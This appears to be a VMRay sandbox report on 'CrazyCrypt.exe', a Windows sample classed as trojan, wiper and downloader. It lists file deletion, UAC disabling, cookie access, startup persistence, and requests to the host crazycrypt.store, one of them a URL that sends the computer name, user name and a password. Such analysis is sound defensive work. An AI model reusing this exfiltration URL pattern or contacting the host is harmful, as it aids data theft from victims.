75620d6a...595a

VTI SCORE: 93/100

Dynamic Analysis Report

Classification: Trojan, Wiper, Downloader

75620d6ae02a9a3beb5eb47020012eee52001bf434304f4e77b43011a6e5595a (SHA256)

CrazyCrypt.exe

Windows Exe (x86-32)

Created at 2019-02-28 11:07:00

Severity	Category	Operation	Classification
4/5	File System	Deletes user files	Wiper
Deletes multiple user files. This is an indicator for ransomware or wiper malware. ... VTI Actions Go to function call
3/5	OS	Modifies system security configuration	-
Disables UAC notifications. ... VTI Actions Go to function call
2/5	Browser	Reads data related to browser cookies	-
Accesses Cookies for "Microsoft Internet Explorer". ... VTI Actions Go to function call
2/5	File System	Known suspicious file	Trojan
File "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\CrazyCrypt.exe" is a known suspicious file. ... VTI Actions Go to file details
1/5	Process	Creates system object	-
Creates mutex with name "SINGLE_INSTANCE_APP_MUTEX". ... VTI Actions Go to function call
Creates mutex with name "Global\.net clr networking". ... VTI Actions Go to function call
1/5	Anti Analysis	Resolves APIs dynamically	-
Resolves an unusually high number of APIs. ... VTI Actions Go to function call
1/5	Persistence	Installs system startup script or application	-
Adds "c:\programdata\microsoft\windows\start menu\programs\startup" to Windows startup folder. ... VTI Actions Go to function call
Adds "c:\users\all users\microsoft\windows\start menu\programs\startup" to Windows startup folder. ... VTI Actions Go to function call
1/5	Network	Performs DNS request	-
Resolves host name "crazycrypt.store". ... VTI Actions Go to function call
1/5	Static	Unparsable sections in file	-
Static analyzer was unable to completely parse the analyzed file: C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\CrazyCrypt.exe. ... VTI Actions Go to file details
1/5	Network	Connects to remote host	-
Outgoing TCP connection to host "178.33.107.134:80". ... VTI Actions Go to function call
1/5	Network	Downloads data	Downloader
URL "http://crazycrypt.store/requests/write.php?computer_name=XDUWTFONO&userName=5p5NrGJn0jS%20HALPmcxz&password=9C354B42". ... VTI Actions Go to function call
URL "http://crazycrypt.store/requests/website.php". ... VTI Actions Go to function call
1/5	Network	Connects to HTTP server	-
URL "crazycrypt.store/requests/write.php?computer_name=XDUWTFONO&userName=5p5NrGJn0jS%20HALPmcxz&password=9C354B42". ... VTI Actions Go to function call
URL "crazycrypt.store/requests/website.php". ... VTI Actions Go to function call

Function Logfile

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".

Before

After